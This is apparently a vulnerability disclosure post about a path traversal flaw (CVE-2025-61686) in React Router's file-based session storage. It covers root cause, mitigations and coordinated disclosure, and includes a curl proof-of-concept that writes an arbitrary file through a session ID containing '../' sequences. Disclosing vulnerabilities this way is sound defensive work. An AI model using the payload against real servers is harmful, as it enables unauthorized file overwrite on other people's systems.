← Back to Blog
CriticalCVSS 9.1Path TraversalCVE-2025-61686

Published 2025

Path Traversal in React Router File Session Storage

BugBunny.ai uncovered a path traversal issue in React Router's file session storage adapter. Crafted session IDs could escape the intended directory and overwrite arbitrary files on the host, impacting any deployment persisting sessions to disk.

Responsibly DisclosedView CVE →

TL;DR

Arbitrary file write via session ID path traversal

Impact:Arbitrary file creation/overwrite on server filesystem
Vector:Crafted session ID with ../ sequences
Surface:React Router apps using file-based session storage
Status:Fixed via coordinated disclosure

Proof of Concept

curl -i -X POST https://<target>/__session/../../../../tmp/owned.json \
  -H "Content-Type: application/json" \
  -d '{
        "id":"../../../../tmp/owned.json",
        "data":{"role":"admin","note":"BugBunny was here"}
      }'

# Result: arbitrary file created/overwritten outside the session directory.

Root Cause

The file session storage adapter did not sanitize session IDs before constructing file paths. An attacker could supply a session ID containing path traversal sequences (../) to write session data to arbitrary locations on the filesystem.

Mitigation

  • Update to the patched version of React Router
  • Validate and sanitize session IDs before use
  • Consider using database-backed session storage instead of file-based

Credits & Disclosure

Identified by BugBunny.ai. The maintainers shipped a fix and coordinated disclosure via GitHub Security Advisories.

Reporter: BugBunny.aiCVE-2025-6168690M weekly downloads
CVE-2025-61686: React Router Path Traversal | BugBunny.ai | BugBunny.ai